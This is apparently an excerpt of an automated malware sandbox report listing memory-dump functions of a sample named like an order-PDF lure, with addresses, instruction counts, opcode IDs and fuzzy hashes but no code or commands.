                                                                        • Opcode ID: e2e3e0cd2f3c9277f6dcc29b1efb22b8f540b75287f7748b49b10f317527973e
                                                                        • Instruction ID: 7b0462b4dc79cdbcbbff5e7a1fe84b87ffcf361d72ce210d28d7f96d7cb54ef5
                                                                        • Opcode Fuzzy Hash: e2e3e0cd2f3c9277f6dcc29b1efb22b8f540b75287f7748b49b10f317527973e
                                                                        • Instruction Fuzzy Hash: 12315D70D0424C9FCB14DFA9C590AEEBFF1AF48314F248469E559AB390DB349945CFA1
                                                                        Function 00DF3CEF Relevance: .1, Instructions: 119COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b13307453a68f4472d027a77a6c176179f603475fed222ec70fa7329ee73daf1
                                                                        • Instruction ID: 9cc546a33f74dce79a2a4a62f0422a751e8f560f7672e763c23a5d51fa04604f
                                                                        • Opcode Fuzzy Hash: b13307453a68f4472d027a77a6c176179f603475fed222ec70fa7329ee73daf1
                                                                        • Instruction Fuzzy Hash: 5641503160414DDFCB14DF68D881ABABBB1EF88310F238565EA529B251C730DA40DB71
                                                                        Function 00DF34A8 Relevance: .1, Instructions: 114COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29bd53efa4dd5440e9a2016fae87138b4d82adce9fe3ea7f1b1d1f8fd4ae5544
                                                                        • Instruction ID: 31a93087610f3baedc177f09589a6b650c6ad2b0e024c8f505b03193d8807e0a
                                                                        • Opcode Fuzzy Hash: 29bd53efa4dd5440e9a2016fae87138b4d82adce9fe3ea7f1b1d1f8fd4ae5544
                                                                        • Instruction Fuzzy Hash: F4419432A0420ECFCB05CF69C8906BEB771EF84344F27C566D616AB251E731DA868B70
                                                                        Function 00DF0DE0 Relevance: .1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2376cbfa93d789e05713987ae0769c1a1371b61dcf2e0ddb723a22e2d93ad4fc
                                                                        • Instruction ID: ca81e420e241994d3230d06395b9ed3e3d280b5bc3ce341b0a299e18ea5349db
                                                                        • Opcode Fuzzy Hash: 2376cbfa93d789e05713987ae0769c1a1371b61dcf2e0ddb723a22e2d93ad4fc
                                                                        • Instruction Fuzzy Hash: 1641B130B00218CFCB15DBA8D0446ADBBF2EF88311F158069E81AEB382DB749D41CBA1
                                                                        Function 00DF09E0 Relevance: .1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a8c9600f47e05d552052e8f4b506be6a106014f3b55b58e14964af2b8f3c181
                                                                        • Instruction ID: 97ef53f507a9125fb7e8e285e65bd741a5a600ddfa1afc2aeba20ac0c328b8da
                                                                        • Opcode Fuzzy Hash: 7a8c9600f47e05d552052e8f4b506be6a106014f3b55b58e14964af2b8f3c181
                                                                        • Instruction Fuzzy Hash: 47319F31E143098FCB00DBB8C8445EEBBB1EF89310F1585A6E511E72A1EB74A985CBA1
                                                                        Function 00DF1F29 Relevance: .1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f55765b5533956f4f510b358f17d884d9bc18613f1272c00ce7332d6428993ef
                                                                        • Instruction ID: 7b4ae4bd54de6efd3c8ca59aafbdcfeeb592817e090c81769ad7b92ca7dacdc7
                                                                        • Opcode Fuzzy Hash: f55765b5533956f4f510b358f17d884d9bc18613f1272c00ce7332d6428993ef
                                                                        • Instruction Fuzzy Hash: 4D31C83AB14208CFDB14DA21D41067E37B2AFC9301F1AC569DA45CB285DB78CD46C7A1
                                                                        Function 047FB8A1 Relevance: .1, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 955848498ea32870382660ea9b52bfd8fd812a0b61404c7d046bc0834623c49e
                                                                        • Instruction ID: a6b11c27965d6a77c0b010da8e861ba0946e1eaf9f6df60941fa1f415235e2f9
                                                                        • Opcode Fuzzy Hash: 955848498ea32870382660ea9b52bfd8fd812a0b61404c7d046bc0834623c49e
                                                                        • Instruction Fuzzy Hash: A241EF74A41219CFDB50CF99D984BEDBBF1FB49300F5490AAE609AB355E734AA84CF40
                                                                        Function 00DF2250 Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b747563fd28cc7e299619d4c04f45c92cc33e3669f2641272ae7be61d0a16367
                                                                        • Instruction ID: c6f95f0680e517d252308cf1f28caef424afdb5b25a38b76f60b1d15b1df7794
                                                                        • Opcode Fuzzy Hash: b747563fd28cc7e299619d4c04f45c92cc33e3669f2641272ae7be61d0a16367
                                                                        • Instruction Fuzzy Hash: 8B21277130C34D9EE7208679988437E7BD4EB54364F1AC93EE682C26D0E264DC85D775
                                                                        Function 047F2D57 Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7e6bb32fef1ae356a429da9ac42742c62e97b1967d1e75b570c717362de04f32
                                                                        • Instruction ID: dfa98241189a7142b4dd83937ecd0b79676aaa77772261421e26766e9d015b08
                                                                        • Opcode Fuzzy Hash: 7e6bb32fef1ae356a429da9ac42742c62e97b1967d1e75b570c717362de04f32
                                                                        • Instruction Fuzzy Hash: 62410DB4A11118CFCB94EF28D9A46E9B7F2FB8D301F1081AAD50AA7359CA345E81CF51
                                                                        Function 00DF0CA8 Relevance: .1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd461b96599bcd3fc30edcaa30f8a7a899433b3d0f00f3bd3a09a51156b710e6
                                                                        • Instruction ID: 7651ec33bdc64c1fa08427c4a9c5092b7a2dbf6e37fac88979a59a53749840d2
                                                                        • Opcode Fuzzy Hash: bd461b96599bcd3fc30edcaa30f8a7a899433b3d0f00f3bd3a09a51156b710e6
                                                                        • Instruction Fuzzy Hash: F9310731A042099FCB10DBB8C94099EFFF2EF89310B1981AAD846E7355DB30AD45CBA0
                                                                        Function 00DF6600 Relevance: .1, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7eaeca21da2b1144cbf36ea0d7ee67a9372492f9c3738a2331566afc4318c0ce
                                                                        • Instruction ID: b4efdd0fee7db784a4224397b992bae78af9d465b32800edcc5d08b41c3e83ba
                                                                        • Opcode Fuzzy Hash: 7eaeca21da2b1144cbf36ea0d7ee67a9372492f9c3738a2331566afc4318c0ce
                                                                        • Instruction Fuzzy Hash: C93118B0D0025C9FCB14DFAAC590AEEBFF5AF48314F248469E909AB350DB749945CFA4
                                                                        Function 00DF0BA0 Relevance: .1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5037e86a96f3721eac9f3c4d7d7ac18e946b504dd15acd00cafa5bbefd1d3eaf
                                                                        • Instruction ID: 1a26b892bc99e2f48e48522ea3b17576fd4d6fea2629ec53c01c9bf8875e6685
                                                                        • Opcode Fuzzy Hash: 5037e86a96f3721eac9f3c4d7d7ac18e946b504dd15acd00cafa5bbefd1d3eaf
                                                                        • Instruction Fuzzy Hash: C121A331A042459FCB24DF79C84499EBBF5FF88350B254A69E486D73A1DB30AD45CB60
                                                                        Function 00A5D5DC Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1714227454.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a5d000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5250420e71e0bc0ab8a0814a5375a33e19d04ca679cbe636cd33b705d30ea0df
                                                                        • Instruction ID: 25b794f315798512768a67f0926d4e28655c80dbabf960a80825f26b73c118ee
                                                                        • Opcode Fuzzy Hash: 5250420e71e0bc0ab8a0814a5375a33e19d04ca679cbe636cd33b705d30ea0df
                                                                        • Instruction Fuzzy Hash: 762145B1104200EFCB10DF14C9C0B2BBFA6FB98315F20C169EC090B656C336D85AC7A2
                                                                        Function 047F7CB8 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7a58b90040c8a9001d288260b2716860833313a895a91e2c78d612fc949bf684
                                                                        • Instruction ID: db08125c68f522e48fc1acd08cf473da617e25d232929bebdc5c69dd090cdd85
                                                                        • Opcode Fuzzy Hash: 7a58b90040c8a9001d288260b2716860833313a895a91e2c78d612fc949bf684
                                                                        • Instruction Fuzzy Hash: AA218970E04209DFCB08DFA9D8446FEBBB6BB8A301F50946AD101A3395E7746A09CB51
                                                                        Function 047F68B8 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3090229699a2ceaa7832cec89ef6ba81fab2ebb6d6116df81e89e6b50a256e0f
                                                                        • Instruction ID: 7cc54beeaccb7566d933aafcef2782a809e9ebbca93a313c2f6961bab977bccc
                                                                        • Opcode Fuzzy Hash: 3090229699a2ceaa7832cec89ef6ba81fab2ebb6d6116df81e89e6b50a256e0f
                                                                        • Instruction Fuzzy Hash: E9216D74A0A208AFCB44CFA8D9855ACFBF8EB49310F1490DED948D7352D631AE02DB91
                                                                        Function 00A6D05C Relevance: .1, Instructions: 74COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1714259931.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a6d000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca850f31098def86c9d4cbe0c6fcc80148a70fd95bafd3c6f055e68f3c0fde75
                                                                        • Instruction ID: e24f86f80f4aac6c2bb0024df94ed6d3cb58fddea3bd9fc9f27ddaf35cdd5f45
                                                                        • Opcode Fuzzy Hash: ca850f31098def86c9d4cbe0c6fcc80148a70fd95bafd3c6f055e68f3c0fde75
                                                                        • Instruction Fuzzy Hash: 5F213771A04240DFCB11DF14D9C0B26BF75FB84314F24C669E90A0B246C336D84AC7A2
                                                                        Function 00DF141C Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 55ddaefeebf10cae76567728a97901f2c3aae3c0d3f4c87e70d289752edad38b
                                                                        • Instruction ID: 9e851fe252eebc38c0c7d5ec24a1f161c7acf18e5532a3e71c5a4e6ec4136423
                                                                        • Opcode Fuzzy Hash: 55ddaefeebf10cae76567728a97901f2c3aae3c0d3f4c87e70d289752edad38b
                                                                        • Instruction Fuzzy Hash: A211D679700109CFCB18DBA8E55057E7BF2EFC4301B11856DE646A3665DE30AD42CB21
                                                                        Function 047F7CC8 Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 143d4799a47d30b94bb32a994d21b1b908baf1340217967b9cdf03b92374c990
                                                                        • Instruction ID: c804a9b8d2243b0a7133f4c50c36157e709015a394baa8e05c0bf40a2e056fe2
                                                                        • Opcode Fuzzy Hash: 143d4799a47d30b94bb32a994d21b1b908baf1340217967b9cdf03b92374c990
                                                                        • Instruction Fuzzy Hash: 41214A70E04209DBDB08DFAAD8546FEBBB6FB89301F50942AD115A3385DB746A05CB51
                                                                        Function 047F76EC Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 338b11028eea66f6ab0b686c7c23db02107d2210fff1cf63a070760e8dfa248e
                                                                        • Instruction ID: 938785cc9b6567f8a26c392d47613de9c07c2191a79d936272ee37772e09ac3b
                                                                        • Opcode Fuzzy Hash: 338b11028eea66f6ab0b686c7c23db02107d2210fff1cf63a070760e8dfa248e
                                                                        • Instruction Fuzzy Hash: F331E3B0A10218CFDB90EF68D8A0BADB7B2FF88345F108199950AA7355DF306D85CF11
                                                                        Function 00DFDCF0 Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6417e217b5d6db561461f10bbcdbfcda8cb0b5e99290d06b1ecea4bccf12f0fb
                                                                        • Instruction ID: d32c4e6b3bc5c6b46248c61048b905057218d123f8db1b1c3560e02bdbf82750
                                                                        • Opcode Fuzzy Hash: 6417e217b5d6db561461f10bbcdbfcda8cb0b5e99290d06b1ecea4bccf12f0fb
                                                                        • Instruction Fuzzy Hash: 3121F8B090530CDFDB44DFA9D8487ADBBF3EB49305F21E199DA09A3249D7748A84CB11
                                                                        Function 00DF0E81 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 304e25514aa04ee36adc2508c3d9c911c9b4e8233ed7b839e3d81ed7df141aed
                                                                        • Instruction ID: 1e3896b06453eb8b979155a1aab82093b1c321a3d0beb1580a0925437146eeb2
                                                                        • Opcode Fuzzy Hash: 304e25514aa04ee36adc2508c3d9c911c9b4e8233ed7b839e3d81ed7df141aed
                                                                        • Instruction Fuzzy Hash: 75211A35A00618CFCB14DBA9C184AACFBF1EF48315F55C065E915AB652D774EC81CF60
                                                                        Function 047F6BE0 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 500435bfab7dbba8de350e15fa036a87d975b0931163970c4842b911b6c19ea0
                                                                        • Instruction ID: a2230cca46a496f465403a597f1a6ae961a01c7b63694d890df666cf4b427819
                                                                        • Opcode Fuzzy Hash: 500435bfab7dbba8de350e15fa036a87d975b0931163970c4842b911b6c19ea0
                                                                        • Instruction Fuzzy Hash: 9A119D78D0A248AFC740DFA9D8505ACBFB4EB85304F14C1DAE99897382E631AB47DF51
                                                                        Function 00DF09D1 Relevance: .1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 34fc2c0daab1c5af74b0b7951c121ee8a99fe28dc0609883ef17d5e430f9214f
                                                                        • Instruction ID: 9e5870002c76236182a475ca88a77af0d52c46fd0f84dcfc6432f730b4a01068
                                                                        • Opcode Fuzzy Hash: 34fc2c0daab1c5af74b0b7951c121ee8a99fe28dc0609883ef17d5e430f9214f
                                                                        • Instruction Fuzzy Hash: B6111930A102088FCB44DFA8C948AADBBF1FF48304F5580A9E915EB3A2D734ED418F50
                                                                        Function 072EA640 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 65504132bcf539fc3253617694abcbd7022f18566fa0bdf4573fd4f35e20ad20
                                                                        • Instruction ID: 962ef5635821f8078e2a360193134d24fb1d01e35b3ba90b0289e621e1b9274d
                                                                        • Opcode Fuzzy Hash: 65504132bcf539fc3253617694abcbd7022f18566fa0bdf4573fd4f35e20ad20
                                                                        • Instruction Fuzzy Hash: 4521CFB4E1020A8FCB44DFA8C5449EEBBF6AB49311F109469E916A7350DB34AA40CFA1
                                                                        Function 00DF134F Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 03bb8f2c53c2a3e14b9b9a7bb9cd3e54c7b665a5b80a3861f81f8e49cb542b17
                                                                        • Instruction ID: ad8a9677f9dff8e18fed9c8f6241bb902ea7acb0815ebed127d3de752fbbbb5a
                                                                        • Opcode Fuzzy Hash: 03bb8f2c53c2a3e14b9b9a7bb9cd3e54c7b665a5b80a3861f81f8e49cb542b17
                                                                        • Instruction Fuzzy Hash: 6221A2B4A00109DFCB00EFA4D9999AEBBB1EFC4301F11C569D506A7355DB30AA06CF52
                                                                        Function 00A5D5D7 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1714227454.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a5d000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction ID: 662e0241206206ff8c5f0395f8610a6b4b3b7c8046025b0bf6e595e5b55c4e94
                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction Fuzzy Hash: 8311D076504284DFDB16CF10D9C4B16BF72FB98324F24C6A9DC490B656C33AD85ACBA2
                                                                        Function 047F78BA Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f14964df79eca8f18e0b46caa712fa1261db641ad7b5d95ccd1046b83326b5b0
                                                                        • Instruction ID: 4917e5da4c59522133c11240ed09d34a564512c2ae470c14bc9f15e41f463756
                                                                        • Opcode Fuzzy Hash: f14964df79eca8f18e0b46caa712fa1261db641ad7b5d95ccd1046b83326b5b0
                                                                        • Instruction Fuzzy Hash: 6A11E770E06148CBDB08DFD9D9547ACB7F2BB49301F64902AD105AB359D7B9A944DB01
                                                                        Function 047F78A5 Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d51cb1dc012dca217d87a905b86918614b3bf2d4155a5a9f400dfc203d3689c7
                                                                        • Instruction ID: 78b5fe3b819b67993b6f04042b2c8c95132f94b4f86e0496b3f4c47ffbfab139
                                                                        • Opcode Fuzzy Hash: d51cb1dc012dca217d87a905b86918614b3bf2d4155a5a9f400dfc203d3689c7
                                                                        • Instruction Fuzzy Hash: 86213B70D06248CFDB08DFD9D5846ACBBF2BB45305F64902AD105EB369D7785948CF01
                                                                        Function 00A6D057 Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1714259931.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a6d000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                        • Instruction ID: 246070f59742d48360976417a4900c7e0a1b2e59f5a11562760de0d739da7731
                                                                        • Opcode Fuzzy Hash: 8904e6e2034f6e8b723f427b0fac37b038faba2da46a35eb3e2bfe2bad4ef527
                                                                        • Instruction Fuzzy Hash: B4110476904280CFDB12CF14D9C4B16BF72FB85314F24C6AADC090B656C33AD85ACBA2
                                                                        Function 00DF0B8F Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4920c2faf3e67d9463582b895ed321a4dfb8deb31ea576b6ea597bfd74331e59
                                                                        • Instruction ID: 44338aa142c116cb482162ba01ee6a83179db0772eae8ffb8f101b82eb9fa3c8
                                                                        • Opcode Fuzzy Hash: 4920c2faf3e67d9463582b895ed321a4dfb8deb31ea576b6ea597bfd74331e59
                                                                        • Instruction Fuzzy Hash: ED112B319082489FCB10CF69CD449EEBFF5EF48360B1946AAE845E7192D771AD09CF60
                                                                        Function 00DF1358 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c437356e9ecee4af4f71f21f3f6dcb02776b1f5e2c703a9f6ae430125c8a81e8
                                                                        • Instruction ID: 108a3b80af51ae5cd3aa3d6fce531e262420322b22dc3634f3912307a081716c
                                                                        • Opcode Fuzzy Hash: c437356e9ecee4af4f71f21f3f6dcb02776b1f5e2c703a9f6ae430125c8a81e8
                                                                        • Instruction Fuzzy Hash: CD118274A00209DFCB00EFA5D9599AEBBB2FF88301F11C568D505A7355DB31AA05CF91
